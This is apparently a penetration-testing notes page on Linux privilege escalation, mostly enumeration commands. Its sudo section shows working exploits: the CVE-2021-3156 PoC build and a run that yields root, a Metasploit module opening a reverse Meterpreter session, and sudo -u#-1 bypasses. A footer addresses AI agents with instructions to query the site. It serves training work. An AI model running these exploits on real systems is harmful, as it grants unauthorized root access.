# Services & Internals Enum ## **Network Interfaces** ```shell-session ip a ``` ## **Hosts** ```shell-session cat /etc/hosts ``` ## **User's Last Login** ```shell-session lastlog Username Port From Latest root **Never logged in** daemon **Never logged in** bin **Never logged in** sys **Never logged in** sync **Never logged in** ...SNIP... systemd-coredump **Never logged in** mrb3n pts/1 10.10.14.15 Tue Aug 2 19:33:16 +0000 2022 lxd **Never logged in** bjones **Never logged in** administrator.ilfreight **Never logged in** backupsvc **Never logged in** cliff.moore pts/0 127.0.0.1 Tue Aug 2 19:32:29 +0000 2022 logger **Never logged in** shared **Never logged in** stacey.jenkins pts/0 10.10.14.15 Tue Aug 2 18:29:15 +0000 2022 htb-student pts/0 10.10.14.15 Wed Aug 3 13:37:22 +0000 2022 ``` ## **Logged In Users** ```shell-session w 12:27:21 up 1 day, 16:55, 1 user, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT cliff.mo pts/0 10.10.14.16 Tue19 40:54m 0.02s 0.02s -bash ``` ## **Command History** ```shell-session history 1 id 2 cd /home/cliff.moore 3 exit 4 touch backup.sh 5 tail /var/log/apache2/error.log 6 ssh ec2-user@dmz02.inlanefreight.local 7 history ``` ## **Finding History Files** ```shell-session find / -type f \( -name *_hist -o -name *_history \) -exec ls -l {} \; 2>/dev/null ``` ## Services listening ``` netstat -tulpn ``` ## Cron ```shell-session ls -la /etc/cron.daily/ ``` {% content-ref url="cron-job-abuse" %} [cron-job-abuse](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/cron-job-abuse) {% endcontent-ref %} ## Proc ```shell-session find /proc -name cmdline -exec cat {} \; 2>/dev/null | tr " " "\n" ``` ## **Installed Packages** ```shell-session apt list --installed | tr "/" " " | cut -d" " -f1,3 | sed 's/[0-9]://g' | tee -a installed_pkgs.list ``` ## Sudo version ```shell-session sudo -V ``` ``` sudo --version ``` You can check if the sudo version is vulnerable using this grep. ``` sudo -V | grep "Sudo ver" | grep "1\.[01234567]\.[0-9]\+\|1\.8\.1[0-9]\*\|1\.8\.2[01234567]" ``` ### CVE-2025-32463 – sudo chroot ("chwoot") Vulnerable builds of **sudo 1.9.14** up to **1.9.17** (all p‑revisions) on most Linux distributions are affected. {% embed url="" %} {% embed url="" %} {% embed url="" %} ### Sudo < 1.8.28 {% embed url="" %} ### Sudoedit Privesc - CVE 2023-22809 Affected sudo versions: 1.8.0 to 1.9.12p1. * Poc: * Metasploit: `exploit/linux/local/sudoedit_bypass_priv_esc` ### Baron Samedit - CVE-2021-3156 Versions 1.8.2-1.8.31p2 to 1.9.0-1.9.5p1 * 1.8.31 - Ubuntu 20.04 * 1.8.27 - Debian 10 * 1.9.2 - Fedora 33 * and others #### Debian 10 (Sudo 1.8.27) {% embed url="" %} #### Ubuntu 20.04 (Sudo 1.8.31) {% embed url="" %} #### Poc All In One {% embed url="" %} ```shell-session $ git clone https://github.com/blasty/CVE-2021-3156.git $ cd CVE-2021-3156 $ make rm -rf libnss_X mkdir libnss_X gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c gcc -fPIC -shared -o 'libnss_X/P0P_SH3LLZ_ .so.2' lib.c ``` ```shell-session $ ./sudo-hax-me-a-sandwich ** CVE-2021-3156 PoC by blasty usage: ./sudo-hax-me-a-sandwich available targets: ------------------------------------------------------------ 0) Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 1) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31 2) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28 ------------------------------------------------------------ manual mode: ./sudo-hax-me-a-sandwich ``` ```shell-session $ cat /etc/lsb-release DISTRIB_ID=Ubuntu DISTRIB_RELEASE=20.04 DISTRIB_CODENAME=focal DISTRIB_DESCRIPTION="Ubuntu 20.04.1 LTS" ``` ```shell-session ~$ ./sudo-hax-me-a-sandwich 1 ** CVE-2021-3156 PoC by blasty using target: Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31 ['/usr/bin/sudoedit'] (56, 54, 63, 212) ** pray for your rootshell.. ** # id uid=0(root) gid=0(root) groups=0(root) ``` * Metasploit exploit: ``` msf6 exploit(linux/local/sudo_baron_samedit) > set session 3 session => 3 msf6 exploit(linux/local/sudo_baron_samedit) > set lhost tun0 lhost => 10.10.16.110 msf6 exploit(linux/local/sudo_baron_samedit) > set lport 443 lport => 443 msf6 exploit(linux/local/sudo_baron_samedit) > run [*] Started reverse TCP handler on 10.10.16.110:443 [!] SESSION may not be compatible with this module: [!] * incompatible session architecture: x86 [*] Running automatic check ("set AutoCheck false" to disable) [!] The service is running, but could not be validated. sudo 1.8.31 may be a vulnerable build. [*] Using automatically selected target: Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31) [*] Writing '/tmp/D9M8vioM30.py' (763 bytes) ... [*] Writing '/tmp/libnss_CcyrQ/Q .so.2' (548 bytes) ... [*] Sending stage (3045380 bytes) to 10.129.203.52 [+] Deleted /tmp/D9M8vioM30.py [+] Deleted /tmp/libnss_CcyrQ/Q .so.2 [+] Deleted /tmp/libnss_CcyrQ [*] Meterpreter session 4 opened (10.10.16.110:443 -> 10.129.203.52:50308) at 2024-04-08 08:23:25 -0400 meterpreter > ls Listing: /tmp ============= Mode Size Type Last modified Name ---- ---- ---- ------------- ---- 100755/rwxr-xr-x 207 fil 2024-04-08 08:20:01 -0400 cPGjXRBL meterpreter > getuid Server username: root meterpreter > ``` ### CVE-2019-18634 - Sudo before 1.8.26 {% embed url="" %} ### All versions below 1.8.28 - CVE-2019-14287 {% hint style="info" %} Requires only a single prerequisite. It had to allow a user in the `/etc/sudoers` file to execute a specific command {% endhint %} #### Example 1 ```shell-session $ sudo -l [sudo] password for cry0l1t3: ********** User cry0l1t3 may run the following commands on Penny: ALL=(ALL) /usr/bin/id ``` ```shell-session $ sudo -u#-1 id root@nix02:/home/cry0l1t3# id uid=0(root) gid=1005(cry0l1t3) groups=1005(cry0l1t3) ``` #### Example 2 ``` $ sudo -l Matching Defaults entries for htb-student on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User htb-student may run the following commands on ubuntu: (ALL, !root) /bin/ncdu ``` ``` $ sudo -u#-1 /bin/ncdu ``` Type the “b” letter on your keybord to open a new shell terminal on the system ``` $ sudo -u#-1 /bin/ncdu # id uid=0(root) gid=1001(htb-student) groups=1001(htb-student) # ``` #### Example 3 ``` sudo -l Password: Matching Defaults entries for user on XXX-NIX04: env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass User ben may run the following commands on XXX-NIX04: (ALL, !root) /bin/bash ``` ``` $ sudo -u#-1 /bin/bash root@XXX-NIX04:/home/user# ``` {% embed url="" %} #### Example 4 - iptable and iptable-save {% embed url="" %} ### **More exploits** {% embed url="" %} * Sudo Buffer Overflow (CVE-2019-18634, version < 1.8.26) * Sudo Security Bypass (CVE-2019-14287, version < 1.8.28) ## Binaries ```shell-session ls -l /bin /usr/bin/ /usr/sbin/ ``` {% content-ref url="vulnerable-services" %} [vulnerable-services](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/vulnerable-services) {% endcontent-ref %} ### GTFOBins ```shell-session for i in $(curl -s https://gtfobins.github.io/ | html2text | cut -d" " -f1 | sed '/^[[:space:]]*$/d');do if grep -q "$i" installed_pkgs.list;then echo "Check GTFO for: $i";fi;done ``` {% content-ref url="suid-sgid" %} [suid-sgid](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/suid-sgid) {% endcontent-ref %} ## **Trace System Calls** ```shell-session strace ping -c1 10.129.112.20 ``` ## Configuration files ```shell-session find / -type f \( -name *.conf -o -name *.config \) -exec ls -l {} \; 2>/dev/null ``` {% content-ref url="credentials-hunting" %} [credentials-hunting](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/credentials-hunting) {% endcontent-ref %} ## Scripts ```shell-session find / -type f -name "*.sh" 2>/dev/null | grep -v "src\|snap\|share" ``` ## **Running Services by User** ```shell-session ps aux | grep root ```
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/linux/services-and-internals-enum.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.